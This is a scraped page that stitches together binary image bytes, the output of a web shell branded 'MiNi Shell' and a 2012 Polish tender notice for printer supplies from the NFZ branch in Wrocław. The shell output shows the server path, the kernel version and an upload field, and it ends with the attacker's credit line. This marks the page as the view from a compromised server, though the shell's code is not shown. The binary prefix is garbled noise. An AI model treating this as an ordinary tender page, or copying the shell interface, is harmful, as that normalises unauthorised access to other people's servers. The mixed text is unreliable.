JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121203/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121203/486532-N-2012.html

<p class="kh_header"><b>Wrocław: Dostawa materiałów eksploatacyjnych do drukarek, faksów, kopiarek, 
urządzeń wielofunkcyjnych oraz duplikatora cyfrowego</b><br>
<b>Numer ogłoszenia: 486532 - 2012; data zamieszczenia: 03.12.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Narodowy Fundusz Zdrowia Dolnośląski Oddział Wojewódzki , ul. Joannitów 6, 50-525 Wrocław, woj. dolnośląskie, tel. (071) 7979317, faks (071) 7979318.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.nfz-wroclaw.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa materiałów eksploatacyjnych do drukarek, faksów, kopiarek, 
urządzeń wielofunkcyjnych oraz duplikatora cyfrowego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Dostawa materiałów eksploatacyjnych do drukarek, faksów, kopiarek, 
urządzeń wielofunkcyjnych oraz duplikatora cyfrowego:
1.	Przedmiotem zamówienia w prowadzonym postępowaniu jest dostawa materiałów eksploatacyjnych do drukarek, faksów, kopiarek, urządzeń wielofunkcyjnych oraz duplikatora cyfrowego dla DOW NFZ zgodnie z warunkami określonymi w SIWZ oraz w załącznikach do SIWZ.
2.	Opis przedmiotu zamówienia został szczegółowo określony w załączniku nr 5 do SIWZ.
3.	Przedmiot zamówienia został sklasyfikowany zgodnie ze Wspólnym Słownikiem Zamówień (CPV):
30192113-6 - wkłady drukujące.
4.	Zamawiający wymaga w ramach zamówienia dostarczenia fabrycznie nowych materiałów eksploatacyjnych.
5.	Nie dopuszcza się materiałów eksploatacyjnych regenerowanych bądź powtórnie napełnianych.
6.	Każdy materiał eksploatacyjny musi posiadać bezpieczne opakowanie w postaci kartonu, wkładki zabezpieczającej, aby przy transporcie nie uległ uszkodzeniu oraz (w miarę możliwości) posiadać folię zabezpieczającą/taśmę zabezpieczającą  wkład przed przypadkowym wysypaniem materiału eksploatacyjnego.
7.	Każdy materiał eksploatacyjny oraz jego opakowanie muszą zawierać informację (w postaci naklejki) do jakiego modelu, modeli urządzeń jest przeznaczony.
8.	Podane w załączniku nazwy materiałów określają wymagany przez Zamawiającego standard i parametry techniczno-funkcjonalno-użytkowe zamawianych materiałów eksploatacyjnych.
9.	Zamawiający dopuszcza dostawę materiałów równoważnych. 
a)	przez produkt równoważny Zamawiający rozumie produkt fabrycznie nowy (nowo wytworzony                         w całości), do którego wytworzenia zastosowano nieużywane wcześniej części i komponenty, kompatybilny ze sprzętem, do którego jest przeznaczony, o parametrach nie gorszych niż produkt zalecany przez producenta sprzętu w zakresie pojemności, wydajności i jakości.
b)	zastosowanie materiałów równoważnych nie może naruszyć warunków gwarancji urządzeń. 
10.	Wykonawca bierze na siebie pełną odpowiedzialność za uszkodzenia sprzętu, które powstały w wyniku zastosowania zaoferowanych przez siebie materiałów eksploatacyjnych.  W razie awarii urządzenia powstałej na skutek wykorzystania wkładu równoważnego Wykonawca zapewni na własny koszt naprawę urządzenia we wskazanym przez Zamawiającego serwisie lub wymianę urządzenia na nowe w terminie               5 dni roboczych od zgłoszenia awarii Wykonawcy.
11.	Realizacja zamówienia musi być oparta o materiały eksploatacyjne w pełni komunikujące się                            z urządzeniem (drukarką, faksem, kopiarką, urządzeniem wielofunkcyjnym, duplikatorem cyfrowym) tzn.                  w przypadku kaset wyposażonych w układ elektroniczny (chip) powinna być możliwość odczytu na wyświetlaczu drukarki, bądź na wydruku strony testowej, aktualnej informacji o stanie zużycia tonera          i pozostałej liczby możliwych kopii do sporządzenia z wykorzystaniem zainstalowanego wkładu eksploatacyjnego.
12.	Materiały eksploatacyjne muszą być oznaczone datą ważności (przydatności do zainstalowania                           w urządzeniu) udzieloną przez producenta (umieszczoną lub wytłoczoną na opakowaniu) lecz nie mniej niż 6 miesięcy od dnia dostarczenia towaru.  
13.	W okresie gwarancji Wykonawca na swój własny koszt zobowiązuje się do przyjęcia i wymiany materiałów eksploatacyjnych odbiegających jakościowo od warunków technicznych wymaganych przez Zamawiającego w terminie 5 dni roboczych od daty zgłoszenia.
Jako reklamacje traktuje się:
a)	zabrudzenia wydruków,
b)	zadruki nieczytelne w części lub w całości arkusza,
c)	zanieczyszczenia urządzeń spowodowane podczas eksploatowania  wkładu drukującego,
d)	częściowa lub całkowita niesprawność urządzenia będąca następstwem wadliwie działającego wkładu drukującego.
14.	Na Wykonawcy ciąży obowiązek pokrycia wszelkich szkód powstałych w urządzeniach posiadanych przez Zamawiającego w wyniku dostarczonych wadliwych materiałów eksploatacyjnych.
15.	Podane ilości materiałów eksploatacyjnych są wielkościami szacunkowymi i w rzeczywistości mogą ulec zmianie z zastrzeżeniem, że dokonane zmiany w tym zakresie nie spowodują zwiększenia wartości brutto umowy. 
a)	Zamawiający zastrzega, że nie wszystkie materiały eksploatacyjne muszą być zakupione  w pełnym zakresie ilościowym. W takim przypadku Wykonawcy nie będą przysługiwały żadne roszczenia finansowe z tytułu zawartej umowy.
b)	Ilość poszczególnych materiałów eksploatacyjnych zależeć będzie od zapotrzebowań Zamawiającego
16.	Wykonawca jest zobowiązany do odbioru od Zamawiającego zużytych materiałów eksploatacyjnych systematycznie co miesiąc i do 6 miesięcy od terminu zakończenia umowy ostatecznie.
17.	Wykonawca zobowiązany jest unieszkodliwić zużyty materiał eksploatacyjny na swój koszt..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 30.19.21.13-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Złozenie przez Wykonawcę oświadczenia. Ocena spełniania warunków zostanie dokonana według formuły spełnia - nie spełnia warunków udziału w postepowaniu w oparciu o informacje zawarte w dokumentach i oświadczeniach zawartych w pkt. 3 Specyfikacji. Nie spełnienie warunków udzaiłu w postepowaniu skutkować będzie wykluczeniem Wykonawcy z postepowania.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Złozenie przez Wykonawcę oświadczenia. Ocena spełniania warunków zostanie dokonana według formuły spełnia - nie spełnia warunków udziału w postepowaniu w oparciu o informacje zawarte w dokumentach i oświadczeniach zawartych w pkt. 3 Specyfikacji. Nie spełnienie warunków udzaiłu w postepowaniu skutkować będzie wykluczeniem Wykonawcy z postepowania.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Złozenie przez Wykonawcę oświadczenia. Ocena spełniania warunków zostanie dokonana według formuły spełnia - nie spełnia warunków udziału w postepowaniu w oparciu o informacje zawarte w dokumentach i oświadczeniach zawartych w pkt. 3 Specyfikacji. Nie spełnienie warunków udzaiłu w postepowaniu skutkować będzie wykluczeniem Wykonawcy z postepowania.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Złozenie przez Wykonawcę oświadczenia. Ocena spełniania warunków zostanie dokonana według formuły spełnia - nie spełnia warunków udziału w postepowaniu w oparciu o informacje zawarte w dokumentach i oświadczeniach zawartych w pkt. 3 Specyfikacji. Nie spełnienie warunków udzaiłu w postepowaniu skutkować będzie wykluczeniem Wykonawcy z postepowania.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
</li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">c)	dotyczy ofert równoważnych: testowe egzemplarze wkładów drukujących (próbek) do następujących drukarek:
HP LaserJet P1505n
HP LaserJet 2055 dn (duża pojemność)
HP Coplor LaserJet 4700 dn - black
HP Color LaserJet 4700 dn - magenta
d)	dotyczy ofert równoważnych tuszy do drukarek atramentowych:  raporty testów wydajności, przeprowadzonych zgodnie z normami ISO/IEC 24711, 24712, przez uprawniony do tego podmiot,   
e)	dotyczy ofert równoważnych tonerów do drukarek laserowych: raporty testów wydajności, przeprowadzonych zgodnie z normami ISO/IEC 19752, 19798, przez uprawniony do tego podmiot</p></li>



</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>14.1	Zmiana postanowień umowy następuje pod rygorem nieważności za zgodą obu stron wyrażoną na piśmie w formie aneksu.
14.2	Z wnioskiem o zmianę postanowień umowy może wystąpić zarówno Wykonawca, jak i Zamawiający.
14.3	Strony dopuszczają także możliwość zmian redakcyjnych umowy, zmian będących następstwem zmian danych Stron ujawnionych w rejestrach publicznych oraz zmian dotyczących wskazania przedstawicieli Stron wyznaczonych do prowadzenia spraw związanych z realizacją umowy.
14.4	Zmiany, o których mowa w pkt 14.3 dokonywane są w drodze jednostronnego pisemnego oświadczenia danej strony i wywołują skutek od dnia doręczenia go drugiej stronie.
14.5	Zamawiający dopuszcza zmianę komparycji umowy w przypadku podziału, łączenia lub przekształcenia Wykonawcy dokonanego na podstawie art. 494, art. 531 lub art. 553 ustawy z dnia 15 września 2000 r. Kodeksu Spółek Handlowych (Dz. U. nr 94, poz. 1037 z późn. zmian.).
14.6	Wszelkie zmiany wprowadzone do niniejszej umowy dokonywane będę z poszanowaniem obowiązków wynikających z obowiązującego prawa, w tym w szczególności ustawy Prawo zamówień publicznych oraz zasad ogólnych rządzących ta ustawą.
14.7	Za zmianę umowy nie będzie traktowana ustawowa zmiana wysokości stawki podatku od towarów i usług VAT.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.nfz-wroclaw.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> siedziba Zamawiającego, budynek B pokój 106.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.12.2012 godzina 10:00, miejsce: siedziba Zamawiającego, Kancelaria.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com